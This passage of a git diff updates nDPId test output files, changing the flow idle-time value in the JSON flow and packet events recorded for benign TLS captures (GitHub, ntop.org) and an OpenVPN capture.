-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113657744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113657744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGerjAqAENjFJyBNnAAbv0\/p6AgM3QzYAQECpNNAAAAQEICh5qXC0OCxAa"} -00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113657633,"flow_last_seen":1581113657751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113657751,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1941,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":4067,"flow_avg_l4_payload_len":581,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","server_names":"github.com,www.github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com","alpn":"http\/1.1","fingerprint":"CA:06:F5:6B:25:8B:7A:0D:4F:2B:05:47:09:39:47:86:51:15:19:84"}} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1581113657633,"flow_last_seen":1581113658456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":32585,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1581113658456,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581113657633,"flow_last_seen":1581113657633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581113657633,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113657633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113657633,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGeqzAqAENjFJyBNnAAbv0\/p5\/AAAAALAC\/\/+NzAAAAgQFtAEDAwUBAQgKHmpbwAAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113657744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113657744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGiLCMUnIEwKgBDQG72cCAzdDM9P6egKASb0C\/0wAAAgQFnAQCCAoOCxAaHmpbwAEDAwo="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113657744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113657744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGerjAqAENjFJyBNnAAbv0\/p6AgM3QzYAQECpNNAAAAQEICh5qXC0OCxAa"} +00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113657633,"flow_last_seen":1581113657751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113657751,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1941,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":4067,"flow_avg_l4_payload_len":581,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","server_names":"github.com,www.github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com","alpn":"http\/1.1","fingerprint":"CA:06:F5:6B:25:8B:7A:0D:4F:2B:05:47:09:39:47:86:51:15:19:84"}} +00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1581113657633,"flow_last_seen":1581113658456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":32585,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1581113658456,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","packets-captured":70,"packets-processed":70,"total-skipped-flows":0,"total-l4-data-len":32585,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581113658456} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 70/70 diff --git a/test/results/443-opvn.pcap.out b/test/results/443-opvn.pcap.out index 68ab92376..6412c77af 100644 --- a/test/results/443-opvn.pcap.out +++ b/test/results/443-opvn.pcap.out @@ -1,11 +1,11 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-opvn.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581153175528} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581153175528,"flow_last_seen":1581153175528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581153175528,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581153175528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581153175528,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+EfAqAFUwAzAZ87tBKpga1quAAAAALAC\/\/\/PlAAAAgQFtAEDAwUBAQgKFg2AOQAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581153175550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581153175550,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGAkzADMBnwKgBVASqzu1gWZU1YGtar6AScSBwigAAAgQFrAQCCAocQO0VFg2AOQEDAwY="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581153175550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581153175550,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+FPAqAFUwAzAZ87tBKpga1qvYFmVNoAQECwALgAAAQEIChYNgE0cQO0V"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581153175528,"flow_last_seen":1581153176626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1581153176626,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1581153175528,"flow_last_seen":1581153184491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8517,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1581153184491,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581153175528,"flow_last_seen":1581153175528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581153175528,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581153175528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581153175528,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+EfAqAFUwAzAZ87tBKpga1quAAAAALAC\/\/\/PlAAAAgQFtAEDAwUBAQgKFg2AOQAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581153175550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581153175550,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGAkzADMBnwKgBVASqzu1gWZU1YGtar6AScSBwigAAAgQFrAQCCAocQO0VFg2AOQEDAwY="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581153175550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581153175550,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+FPAqAFUwAzAZ87tBKpga1qvYFmVNoAQECwALgAAAQEIChYNgE0cQO0V"} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581153175528,"flow_last_seen":1581153176626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1581153176626,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1581153175528,"flow_last_seen":1581153184491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8517,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1581153184491,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":46,"total-skipped-flows":0,"total-l4-data-len":8517,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1581153184491} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 46/46 diff --git a/test/results/443-safari.pcap.out b/test/results/443-safari.pcap.out index f39e1b84c..0a2f9055c 100644 --- a/test/results/443-safari.pcap.out +++ b/test/results/443-safari.pcap.out @@ -1,13 +1,13 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-safari.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581109359601} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109359601,"flow_last_seen":1581109359601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581109359601,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109359601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109359601,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs8nAbvmgoUNAAAAALAC\/\/+6MQAAAgQFtAEDAwUBAQgKHinouAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109359639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109359639,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7zyeqmyMX5oKFDqAS\/ogx6QAAAgQFrAQCCAolLqfYHinouAEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109359639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109359639,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs8nAbvmgoUOqpsjGIAQECxO5AAAAQEICh4p6N4lLqfY"} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109359601,"flow_last_seen":1581109359641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1581109359641,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1673,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01143{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109359601,"flow_last_seen":1581109359683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3113,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1581109359683,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"f9fcb52580329fb6a9b61d7542087b90","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1581109359601,"flow_last_seen":1581109360696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17203,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1581109360696,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109359601,"flow_last_seen":1581109359601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581109359601,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53031,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 